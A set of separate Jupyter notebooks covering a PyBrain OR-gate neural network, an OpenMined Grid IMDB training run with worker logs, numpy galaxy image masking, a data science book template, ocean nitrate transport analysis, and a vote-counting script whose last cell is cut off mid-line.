base.addSample((1,0), (1, )) # adding the fourth training sample to the dataset base.addSample((1,1), (1, )) # note that the samples follow the truth table of the OR logic structure # showing the predictor attributes of the training set print(base['input']) # showing the target attributes of the training set print(base['target']) # defining the training object for the dataset created # the learning rate will be 0.01 treinamento = BackpropTrainer(rede, dataset = base, learningrate = 0.01) # creating lists to plot a chart of the error rate of the algorithm eixoX = list() eixoY = list() # loop to train the neural network 4,999 times (range(1, 5000)) for indice in range(1, 5000): # training with the dataset created erro = treinamento.train() eixoX.append(indice - 1) eixoY.append(erro) # shows the error rate every 1000 iterations if indice % 1000 == 0: print('Error: {}'.format(erro)) # checking the predictive ability of the algorithm print(rede.activate([0, 0])) # expected output: close to 0 print(rede.activate([1, 0])) # expected output: close to 1 print(rede.activate([0, 1])) # expected output: close to 1 print(rede.activate([1, 1])) # expected output: close to 1 (the original comment said 0, but OR(1,1) = 1) # importing the Python matplotlib library import matplotlib.pyplot as plt # setting the figure size plt.figure(figsize = (10,5)) # plotting the error rate after each training step plt.plot(eixoX, eixoY, color = "Red", label = "Error rate after each training step") # setting the chart title plt.title("Error rate of the algorithm") # adding a grid to the chart plt.grid(True) # removing the chart frame plt.box(False) # adding the chart legend plt.legend() # adding a label to the x axis plt.xlabel("Training") # adding a label to the y axis plt.ylabel("Error") ###Output _____no_output_____
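###Markdown As a final sketch (assuming the network `rede` trained above), we can threshold the activations at 0.5 to recover the OR truth table: ###Code for entrada in [(0, 0), (0, 1), (1, 0), (1, 1)]:
    saida = rede.activate(entrada)[0]            # raw sigmoid output
    print(entrada, "->", 1 if saida > 0.5 else 0)
###Output _____no_output_____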
notebooks/experimental/Client Worker Tree.ipynb
###Markdown IMDB FastText ExampleAdopter for Grid from https://raw.githubusercontent.com/keras-team/keras/master/examples/imdb_fasttext.py ###Code from grid.clients.keras import KerasClient client = KerasClient() from __future__ import print_function import numpy as np import os from keras.preprocessing import sequence from keras.models import Sequential from keras.layers import Dense from keras.layers import Embedding from keras.layers import GlobalAveragePooling1D from keras.datasets import imdb ngram_range = 1 max_features = 20000 maxlen = 400 batch_size = 32 embedding_dims = 50 epochs = 5 model = Sequential() # we start off with an efficient embedding layer which maps # our vocab indices into embedding_dims dimensions model.add(Embedding(max_features, embedding_dims, input_length=maxlen)) # we add a GlobalAveragePooling1D, which will average the embeddings # of all words in the document model.add(GlobalAveragePooling1D()) # We project onto a single unit output layer, and squash it with a sigmoid: model.add(Dense(1, activation='sigmoid')) model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) from pathlib import Path task = 'imdb10' parent_folder = os.path.abspath('..') client.add_task(task, adapter=f'{parent_folder}/grid/adapters/imdb.py') client.add_model(task, model) # model.fit(x_train, y_train, # batch_size=batch_size, # epochs=epochs, # validation_data=(x_test, y_test)) ###Output Using TensorFlow backend. ###Markdown Worker ###Code from grid.workers.tree import GridTree worker_tree = GridTree() ###Output UPDATE: Connecting to IPFS... this can take a few seconds... SUCCESS: Connected!!! - My ID: QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod  v . ._, |_ ., `-._\/ . \ / |/_ \ _\, y | \// _\_.___\, \/ -.\|| `7-,--.`._|| / / , /' `-. `./ / |/_.' | |// Running Grid in |_ / Tree Mode |- | | =| | | --------------------/ , . \--------._ UPDATE: Querying known workers... WORKER: /p2p-circuit/ipfs/Qmaosc64H6Y29VFCFYJzJXCX9AuRp7RCsekLmajHNVEARD...SUCCESS!!! WORKER: /p2p-circuit/ipfs/QmQabt3SWuDvjse9z7GAcH2BGQv4wH8bumkd4x5oXN2obX...FAIL!!! UPDATE: Searching for IPFS nodes - 34 found overall - 1 are OpenMined workers SUCCESS: Found 1 OpenMined nodes!!!  TASKS  From Name Address listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod================================================================== QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb8 QmXCQVa2iXAPhFWDSRTVuh7kGSXiw1j5T7zGztPBBRwAQg listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodall parts .... ['', 'Users', 'yanndupis', '.openmined'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ full path /Users/yanndupis/.openmined/grid/ full path /Users/yanndupis/.openmined/grid/adapters/ Loading data... 25000 train sequences 25000 test sequences Average train sequence length: 238 Average test sequence length: 230 Pad sequences (samples x time) listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodx_train shape: (25000, 400) x_test shape: (25000, 400) Build model... 
QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb9 QmRJF6noF4RhmkDpkzbzP3KLitMZNHs8mg6vGT8J5zURAt listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod all parts .... ['', 'Users', 'yanndupis', '.openmined'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ full path /Users/yanndupis/.openmined/grid/ full path /Users/yanndupis/.openmined/grid/adapters/ Loading data... 25000 train sequences 25000 test sequences Average train sequence length: 238 Average test sequence length: 230 Pad sequences (samples x time) x_train shape:listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod (25000, 400) x_test shape: (25000, 400) Build model... QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb10 QmS1KzjYMx1qjE3EvE3BJYBxjxQfXXrhthxteyqjBZWBFhlisting models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod all parts .... ['', 'Users', 'yanndupis', '.openmined'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ full path /Users/yanndupis/.openmined/grid/ full path /Users/yanndupis/.openmined/grid/adapters/ Loading data... 25000 train sequences 25000 test sequences Average train sequence length: 238 Average test sequence length: 230 Pad sequences (samples x time) listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodx_train shape: (25000, 400) x_test shape: (25000, 400) Build model...  TASKS  From Name Address ================================================================== QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb8 QmXCQVa2iXAPhFWDSRTVuh7kGSXiw1j5T7zGztPBBRwAQg ALREADY SUBSCRIBED TO openmined:task:add:imdb8 listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod all parts .... ['', 'Users', 'yanndupis', '.openmined'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ full path /Users/yanndupis/.openmined/grid/ full path /Users/yanndupis/.openmined/grid/adapters/ Loading data... 25000 train sequences 25000 test sequences Average train sequence length: 238 Average test sequence length: 230 Pad sequences (samples x time) listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod x_train shape: (25000, 400) x_test shape: (25000, 400) Build model...ALREADY SUBSCRIBED TO openmined:task:add:imdb9 listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodQmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb9 QmRJF6noF4RhmkDpkzbzP3KLitMZNHs8mg6vGT8J5zURAt all parts .... ['', 'Users', 'yanndupis', '.openmined'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ all parts .... 
['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ full path /Users/yanndupis/.openmined/grid/ full path /Users/yanndupis/.openmined/grid/adapters/ Loading data... 25000 train sequences 25000 test sequences Average train sequence length: 238 Average test sequence length: 230 Pad sequences (samples x time) listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod x_train shape: (25000, 400) x_test shape: (25000, 400) Build model... QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb10 QmS1KzjYMx1qjE3EvE3BJYBxjxQfXXrhthxteyqjBZWBFhALREADY SUBSCRIBED TO openmined:task:add:imdb10 listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod all parts .... ['', 'Users', 'yanndupis', '.openmined'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ full path /Users/yanndupis/.openmined/grid/ full path /Users/yanndupis/.openmined/grid/adapters/ Loading data... 25000 train sequences 25000 test sequences Average train sequence length: 238 Average test sequence length: 230 Pad sequences (samples x time) x_train shape: (25000, 400) x_test shape: (25000, 400) Build model...
numpy/Numpy_GalaxyMultiWaveLength_sol.ipynb
###Markdown Galaxy multiWaveLength Analysis using numpyData Source: https://asd.gsfc.nasa.gov Loading the libraries we need ###Code %matplotlib inline import numpy as np import imageio from skimage import color import matplotlib.pyplot as plt import copy from skimage.color import rgb2gray from PIL import Image ###Output _____no_output_____ ###Markdown Creating a numpy array from an image file: load and display each picture from difference wavelength (GammaRay, Xray, Infrared, radio) find the shape of the array, explain each dimensionSample of output:(320, 5760, 3) ###Code photo_xRay = imageio.imread('./multiwavelength/Xray.jpg') fig, ax=plt.subplots(figsize=(18, 4)) ax.imshow(photo_xRay , cmap='gray') print(photo_xRay.shape) plt.imshow(photo_xRay) plt.show() ###Output _____no_output_____ ###Markdown As we have 3 dimensions (RGB)and RGB does not add information, merge all 3 dimensions in a single one using grey scale image using the function rgb2gray Sample of output:(320, 5760) ###Code photo_xRay = imageio.imread('./multiwavelength/Xray.jpg') photo_xRay_grey = color.rgb2gray(photo_xRay) fig, axRay=plt.subplots(figsize=(18, 4)) axRay.imshow(photo_xRay_grey, cmap='gray') print(photo_xRay_grey.shape) photo_radio = imageio.imread('./multiwavelength/Radio.jpg') photo_radio_grey = color.rgb2gray(photo_radio) fig, axRadio=plt.subplots(figsize=(18, 4)) axRadio.imshow(photo_radio_grey, cmap='gray') photo_gammaRay = imageio.imread('./multiwavelength/GammaRay.jpg') photo_gammaRay_grey = color.rgb2gray(photo_gammaRay) fig, axGamma=plt.subplots(figsize=(18, 4)) axGamma.imshow(photo_gammaRay_grey, cmap='gray') ###Output (320, 5760) ###Markdown Merge all 3 waveLength in a single rgb image. Define to which color are linked XRay, Radio and Gamma waveLengthSample of output: ###Code photo_all_band=copy.deepcopy(photo_xRay) photo_all_band[:,:,0]=photo_xRay_grey*255 photo_all_band[:,:,1]=photo_radio_grey*255 photo_all_band[:,:,2]=photo_gammaRay_grey*255 fig, axAll=plt.subplots(figsize=(18, 4)) axAll.imshow(photo_all_band) ###Output _____no_output_____ ###Markdown apply some cleaning to remove noise with value <150Sample of output: ###Code photo_all_band_cleaning_mask=photo_all_band<150 photo_all_band[photo_all_band_cleaning_mask]=0 fig, axFilter=plt.subplots(figsize=(18, 4)) axFilter.imshow(photo_all_band) ###Output _____no_output_____ ###Markdown apply some cleaning to highlight part of the picture where XRay>220, Radio>150, GammaRay>150Sample of output: ###Code photo_all_band_highligt_mask=(photo_all_band[:,:,0]>220)&(photo_all_band[:,:,1]>150)&(photo_all_band[:,:,2]>150) print(photo_all_band_highligt_mask) #photo_all_band[photo_all_band_highligt_mask]=255 plt.imshow(photo_all_band_highligt_mask) photo_all_band_cleaned=copy.deepcopy(photo_all_band) photo_all_band_cleaned[np.logical_not(photo_all_band_highligt_mask)]=0 fig, axHighLight=plt.subplots(figsize=(18, 4)) axHighLight.imshow(photo_all_band_cleaned) ###Output [[False False False ... False False False] [False False False ... False False False] [False False False ... False False False] ... [False False False ... False False False] [False False False ... False False False] [False False False ... False False False]] ###Markdown Only a single part of the picture should be highlighted. 
Try to find the center of its position using the following mask: ###Code total_rows, total_cols, total_layers = photo_all_band.shape
X, Y = np.ogrid[:total_rows, :total_cols]
fig = plt.figure()
print("X = ", X.shape, " and Y = ", Y.shape)
plt.imshow(photo_all_band)
plt.show()

# scan candidate centers on a 100-pixel grid and keep the one whose
# surrounding disk captures the largest total signal
summ = 0
for colPotentialCenter in range(0, total_cols, 100):
    for rowPotentialCenter in range(0, total_rows, 100):
        dist_from_potential_center = (X - rowPotentialCenter)**2 + (Y - colPotentialCenter)**2
        radius = 1000   # threshold on the squared distance defining the disk
        circular_mask = (dist_from_potential_center > radius)
        if photo_all_band[np.logical_not(circular_mask)].sum() > summ:
            summ = photo_all_band[np.logical_not(circular_mask)].sum()
            centerOfBurstrowID = rowPotentialCenter
            centerOfBurstcolID = colPotentialCenter

#print("center X = ", centerOfBurstrowID, " and center Y = ", centerOfBurstcolID)
fig, axCircular = plt.subplots(figsize=(18, 4))
axCircular.imshow(photo_all_band)
axCircular.vlines(centerOfBurstcolID, 0, total_rows, colors='w')
axCircular.hlines(centerOfBurstrowID, 0, total_cols, colors='w') ###Output X = (320, 1) and Y = (1, 5760)
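###Markdown To inspect the detected region more closely, here is a minimal sketch reusing `centerOfBurstrowID` and `centerOfBurstcolID` from above to crop a window around the estimated center: ###Code half = 200   # half-width of the crop window, in pixels
r0, r1 = max(centerOfBurstrowID - half, 0), min(centerOfBurstrowID + half, total_rows)
c0, c1 = max(centerOfBurstcolID - half, 0), min(centerOfBurstcolID + half, total_cols)
plt.figure(figsize=(6, 6))
plt.imshow(photo_all_band[r0:r1, c0:c1])
plt.show()
###Output _____no_output_____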
book/community/templates/template-environments-postprocessing.ipynb
###Markdown [Post-processing pipeline/dataset name]:::{eval-rst}:opticon:`tag`:badge:`[Environment],badge-primary`:badge:`Post-processing,badge-secondary`::: Context Purpose*Describe the purpose of the use case.* Post-processing approach*Describe the most relevant features of the post-processing pipeline.* Highlights*Provide 3-5 bullet points that convey the use case’s core procedures. Each bullet point must have a maximum of 85 characters, including spaces.** Highlight 1* Highlight 2 Contributions NotebookAuthor (role), Affiliation, GitHub alias Post-processing codebaseAuthor (role), Affiliation, GitHub alias Post-processing publications```{bibliography} :style: plain :list: bullet :filter: topic % "replace by the `topic` entry linked to the publication(s) in the `_bibliography/references.bib` file"``` Post-processing fundingIndicate details of the funding.:::{note}*Optional: add credits or acknowledgements to data providers or authors of code snippets*::: Install and load libraries*For installation, add only libraries not listed in the [environment.yml](https://github.com/alan-turing-institute/environmental-ds-book/blob/master/environment.yml) file, but required by the notebook. Libraries can be installed in silent mode e.g. `pip -q install `**For loading libraries, order them according to their role e.g. libraries to manipulate folders i.e. os (first), handle data i.e. numpy, xarray (second), visualisation e.g. holoviews (third), etc. The cell below contains two libraries, `os` and `warning` which are common among the notebooks. Don't remove them.* ###Code import os import warnings warnings.filterwarnings(action='ignore') ###Output _____no_output_____ ###Markdown Set project structure*The cell below creates a separate folder to save the notebook outputs. This facilitates the reader to inspect inputs/outputs stored within a defined destination folder. Change `` with your notebook identifier.* ###Code notebook_folder = '../postprocessing/<replace-by-notebook-filename>' if not os.path.exists(notebook_folder): os.makedirs(notebook_folder) ###Output _____no_output_____ ###Markdown Load data*Load full dataset from original or mirror sources. If the license of the dataset permits, we suggest creating sample data (preprocessed) for the notebook stored in a data repository e.g. Zenodo.* Preprocessing*Add code demonstrating the post-processing pipeline.* Outputs*Provide a brief inspection of the post-processing outputs and their interpretation* Summary*Provide 3-5 bullet points summarising the main aspects of the post-processing and tools covered in the notebook.* * Sentence 1 e.g. `tool-name` to perform...* Sentence 2 e.g. `tool-name` to perform... Additional information**License**: The code in this notebook is licensed under the MIT License. The Environmental Data Science book is licensed under the Creative Commons by Attribution 4.0 license. See further details [here](https://github.com/alan-turing-institute/environmental-ds-book/blob/master/LICENSE.md).**Contact**: If you have any suggestion or report an issue with this notebook, feel free to [create an issue](https://github.com/alan-turing-institute/environmental-ds-book/issues/new/choose) or send a direct message to [[email protected]](mailto:[email protected]). ###Code from datetime import date print(f'Last tested: {date.today()}') ###Output _____no_output_____
notebooks/revisions/transportsUpper6-WithArrowsAndV-noMRub.ipynb
###Markdown 6 m is mean nitricline depth and just below 10% light level ###Code import matplotlib.pyplot as plt import netCDF4 as nc import numpy as np import os import glob import datetime as dt from salishsea_tools import viz_tools from matplotlib.ticker import FormatStrFormatter import cmocean from salishsea_tools import viz_tools, evaltools as et import NorthNut as nn import matplotlib.gridspec as gridspec import pickle import matplotlib as mpl import matplotlib.patheffects as path_effects mpl.rc('xtick', labelsize=8) mpl.rc('ytick', labelsize=8) mpl.rc('legend', fontsize=8) mpl.rc('axes', titlesize=8) mpl.rc('axes', labelsize=8) mpl.rc('figure', titlesize=8) mpl.rc('font', size=8) mpl.rc('text', usetex=True) mpl.rc('text.latex', preamble = r''' \usepackage{txfonts} \usepackage{lmodern} ''') mpl.rc('font', family='sans-serif', weight='normal', style='normal') from pandas.plotting import register_matplotlib_converters register_matplotlib_converters() %matplotlib inline ig0=nn.ig0 ig1=nn.ig1 jg0=nn.jg0 jg1=nn.jg1 tmask=nn.tmask umask=nn.umask vmask=nn.vmask umask0=nn.umask0 vmask0=nn.vmask0 boxCol=nn.boxCol colL=nn.colL colR=nn.colR e12t=nn.e12t k=6 #depth presented here k1=30 # max depth to do calcs to start=dt.datetime(2015,5,15) # originally 5/15-8/15, but changed to even number of fortnights (6, end is included) end=dt.datetime(2015,8,20) mod_basedir='/data/eolson/results/MEOPAR/SS36runs/CedarRuns/rev_noMrubrum/' mod_nam_fmt='long' mod_flen=10 saveloc='/data/eolson/results/MEOPAR/SS36runs/calcFiles/NTransport/' fver='noMrubrum' ###Output _____no_output_____ ###Markdown made interval a multiple of a fortnight in attempt to minimize aliasing of tidal cycle: ###Code dt.datetime(2015,5,15)+dt.timedelta(days=7*14) # calc transports: boxes in full model coords boxes,boxesS=nn.defboxes(k) np.mean(nn.e1t[boxesS[4]['j'][1],boxesS[4]['i'][0]:boxesS[4]['i'][1]]) np.sum(tmask[6,boxesS[4]['j'][1],(boxesS[4]['i'][0]):(boxesS[4]['i'][1])])*427*7/1e6 np.sum(nn.e3t_0[:7,boxesS[4]['j'][1],boxesS[4]['i'][0]:boxesS[4]['i'][1]],0) np.diff(np.array(([boxes[0]['j'][1]]+[boxes[el]['j'][0] for el in range(0,6)]))) fig,ax=plt.subplots(1,1,figsize=(3,5)) viz_tools.set_aspect(ax) ax.pcolormesh(nn.vmask0) ax.pcolormesh(nn.tmask[0,:,:]) #ax.contour(tmask[k,:,:],[.5]) ax.contour(tmask[0,:,:],[.5]) for el in boxes.keys(): iii,jjj=nn.makebox(nn.boxcoordsT(boxes[el])) ax.plot(iii-ig0,jjj-jg0,'-',color='w',linewidth=1) flistV=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_V',1) flistU=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_U',1) flistW=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_W',1) #flistC=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'carp_T',1) flistT=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'ptrc_T',1) #flistP=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_T',1) #flistGV=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_V',1) #flistGU=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_U',1) flistT.loc[0,['t_0']].values[0] flistT.loc[len(flistT)-1,['t_n']].values[0]-dt.timedelta(days=1) end NBound, SBound, EBound, BBound, NBoundMix, SBoundMix, EBoundMix, BBoundMix, times, boxes = nn.calcTranspsReduced( start,end,k1,mod_flen,fver,saveloc,boxes,boxesS,flistV,flistU,flistW,flistT,recalc=False) # vertical transport into 4th box np.shape(BBound[3]) ###Output _____no_output_____ ###Markdown NO3_VT v*dx*dz*C = mmol N/s NO3_UT u*dy*dz*C = 
m/s*m2*mmol/m3 = mmol N/s VLDFNO3 dC/dt= (F1-F0)/(dx*dy*dz) => F in mmol N/s ULDFNO3 mmol N/sNO3_WT w*dx*dy*C = mmol N/sVMIXNO3 ~(Cadz-Cbdz)/dt=mmol/m3*1/s*m = mmol N/m2/s ###Code mapCol=(0.67, 0.8, 0.64) # rgb cmb=cmocean.tools.crop_by_percent(cmocean.cm.balance, 45, which='both', N=None) cmb.set_bad(mapCol) cmc=cmocean.tools.crop_by_percent(cmocean.cm.tarn_r, 40, which='both', N=None) cmc.set_bad(mapCol) for el in BBound.keys(): print(el,np.mean(np.sum(BBound[el][:,:k]+BBoundMix[el][:,:k],1))*1e-3) ###Output 0 91.90835155323016 1 86.66483786685788 2 -109.28906201525717 3 61.488358886550685 4 -2.486394686184514 5 47.570619286285726 ###Markdown Sum of vertical mixing and transport NO3 supply to region in boxes: ###Code np.mean(np.sum(BBound[0][:,:k]+BBoundMix[0][:,:k]+\ BBound[1][:,:k]+BBoundMix[1][:,:k]+\ BBound[2][:,:k]+BBoundMix[2][:,:k]+\ BBound[3][:,:k]+BBoundMix[3][:,:k]+\ BBound[4][:,:k]+BBoundMix[4][:,:k]+\ BBound[5][:,:k]+BBoundMix[5][:,:k],1))*1e-3 ###Output _____no_output_____ ###Markdown Divide by area: ###Code ABoxes=nn.boxAreas(k) # units are umol/m2/s Asum=ABoxes[0]+ABoxes[1]+ABoxes[2]+ABoxes[3]+ABoxes[4]+ABoxes[5] np.mean(np.sum(BBound[0][:,:k]+BBoundMix[0][:,:k]+\ BBound[1][:,:k]+BBoundMix[1][:,:k]+\ BBound[2][:,:k]+BBoundMix[2][:,:k]+\ BBound[3][:,:k]+BBoundMix[3][:,:k]+\ BBound[4][:,:k]+BBoundMix[4][:,:k]+\ BBound[5][:,:k]+BBoundMix[5][:,:k],1))/Asum*1e3 NBoundC, SBoundC, EBoundC, BBoundC, NBoundMixC, SBoundMixC, EBoundMixC, BBoundMixC = \ nn.transpConversions(boxes,NBound,SBound,EBound,BBound,NBoundMix,SBoundMix,EBoundMix,BBoundMix,k) BBoundC mask=dict() mask['V']=vmask0 mask['U']=umask0 mask['W']=tmask[k,:,:] fig=plt.figure(figsize=(7.5,5.2)) gs0=gridspec.GridSpec(2,2,hspace=0.24,wspace=.13,left=.01,right=.93,bottom=.022,top=.92, width_ratios=[1,1],height_ratios=[1,1]) ax=list() cbax=list() for jx in range(0,2): if jx==0: gsi=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[0,jx], width_ratios=[10,10*(ig1-ig0-.5)/(ig1-ig0+13),11-10*(ig1-ig0-.5)/(ig1-ig0+13)],wspace=.1) gsl=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[1,jx], width_ratios=[10,10,1],wspace=.1) elif jx==1: gsi=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[0,jx], width_ratios=[10,10,1],wspace=.1) gsl2=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[1,jx], width_ratios=[10,10,1],wspace=.1) ax1=fig.add_subplot(gsi[0]) ax1.get_xaxis().set_visible(False) ax1.get_yaxis().set_visible(False) viz_tools.set_aspect(ax1) ax2=fig.add_subplot(gsi[1]) ax2.get_xaxis().set_visible(False) ax2.get_yaxis().set_visible(False) viz_tools.set_aspect(ax2) ax3=fig.add_subplot(gsi[2]) ax.append(ax1,) ax.append(ax2,) cbax.append(ax3,) ax4=fig.add_subplot(gsl2[0]) ax4.get_xaxis().set_visible(False) ax4.get_yaxis().set_visible(False) viz_tools.set_aspect(ax4) ax5=fig.add_subplot(gsl2[1]) ax5.get_xaxis().set_visible(False) ax5.get_yaxis().set_visible(False) viz_tools.set_aspect(ax5) ax6=fig.add_subplot(gsl2[2]) ax7=fig.add_subplot(gsl[0]) viz_tools.set_aspect(ax7) ax9=fig.add_subplot(gsl[2]) ax.append(ax4,) ax.append(ax5,) ax.append(ax7,) cbax.append(ax6,) cbax.append(ax9,) v1=3000 m=ax[0].pcolormesh(mask['V'],cmap=cmb) ax[0].set_title('Northward NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nAdvection + Mixing') m=ax[1].pcolormesh(mask['U'],cmap=cmb) cb0=fig.colorbar(m,cax=cbax[0]) ax[1].set_title('Eastward NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nAdvection + Mixing') v2=15 m=ax[2].pcolormesh(mask['W'],cmap=cmc) ax[2].set_title('Vertical NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nAdvection') 
m=ax[3].pcolormesh(mask['W'],cmap=cmc) cb1=fig.colorbar(m,cax=cbax[1]) ax[3].set_title('Vertical NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nMixing') nn.drawboxesV(ax[0],boxes,boxCol) nn.drawboxesU(ax[1],boxes,boxCol) nn.drawboxesT(ax[2],boxes,boxCol) nn.drawboxesT(ax[3],boxes,boxCol) for iax in ax: iax.set_facecolor(mapCol) ax[0].set_xlim(-13,ig1-ig0) ax[1].set_xlim(0,ig1-ig0-.5) ax[2].set_xlim(-13,ig1-ig0) ax[3].set_xlim(-13,ig1-ig0) ax[0].set_ylim(.5,jg1-jg0-.5) ax[1].set_ylim(1,jg1-jg0) ax[2].set_ylim(1,jg1-jg0) ax[3].set_ylim(1,jg1-jg0) nn.annotYTranspUpper(ax[0],boxes,NBoundC,SBoundC,NBoundMixC,SBoundMixC) nn.annotXTranspUpper(ax[1],boxes,EBoundC,EBoundMixC) nn.annotWTTranspUpper(ax[2],boxes,BBoundC) nn.annotWMTranspUpper(ax[3],boxes,BBoundMixC) x1=ax[1].get_position() xc1=cbax[0].get_position() cbax[0].set_position(mpl.transforms.Bbox.from_bounds(xc1.bounds[0],x1.bounds[1],.015,x1.bounds[3])) x2=ax[3].get_position() xc2=cbax[1].get_position() cbax[1].set_position(mpl.transforms.Bbox.from_bounds(xc2.bounds[0],x2.bounds[1],.015,x2.bounds[3])) fig.canvas.draw() #fig.savefig('/data/eolson/results/MEOPAR/biomodelevalpaper/figsNNut/Ntransports0_k'+str(k)+'.png',dpi=300) ###Output _____no_output_____
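###Markdown A small diagnostic sketch (assuming `times`, `BBound`, and `BBoundMix` from the cells above are still in scope): the time series of total vertical NO$_3$ supply summed over the six boxes, converted to mol N s$^{-1}$ as in the means above: ###Code total = np.zeros(len(times))
for el in range(6):
    total += np.sum(BBound[el][:, :k] + BBoundMix[el][:, :k], 1)   # sum over the upper k levels
fig, ax = plt.subplots(figsize=(8, 2))
ax.plot(times, total*1e-3, 'k-')   # mmol N/s -> mol N/s
ax.set_ylabel('NO$_3$ supply (mol N s$^{-1}$)')
###Output _____no_output_____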
.ipynb_checkpoints/counting_election_votes_analysis-checkpoint.ipynb
###Markdown Counting Election Votes ###Code # Import Dependencies import os import csv # Set the File Path filepath = os.path.join(".","resources","election_data_test.csv") output_file = os.path.join(".", "votes.txt") ###Output _____no_output_____ ###Markdown Draft 1 ###Code # Count all election votes in 2 loops
with open(filepath, newline='') as csvfile:
    csvreader = csv.reader(csvfile, delimiter=',')
    header = next(csvreader)
    #print(header)
    total_votes = []
    for candidate_name in csvreader:
        total_votes.append(candidate_name[2])
        print(candidate_name[2])

votes_dict = {candidate:total_votes.count(candidate) for candidate in total_votes}

# Build the report as a single string so it can be printed and written to file
output = (
    "Election Results\n"
    f"Total Votes: {len(total_votes)}\n"
    f"Khan: {votes_dict['Khan']/len(total_votes)*100}% ({votes_dict['Khan']})\n"
    f"Correy: {votes_dict['Correy']/len(total_votes)*100}% ({votes_dict['Correy']})\n"
    f"Li: {votes_dict['Li']/len(total_votes)*100}% ({votes_dict['Li']})\n"
)
print(output)

with open(output_file, 'w') as txt_file:
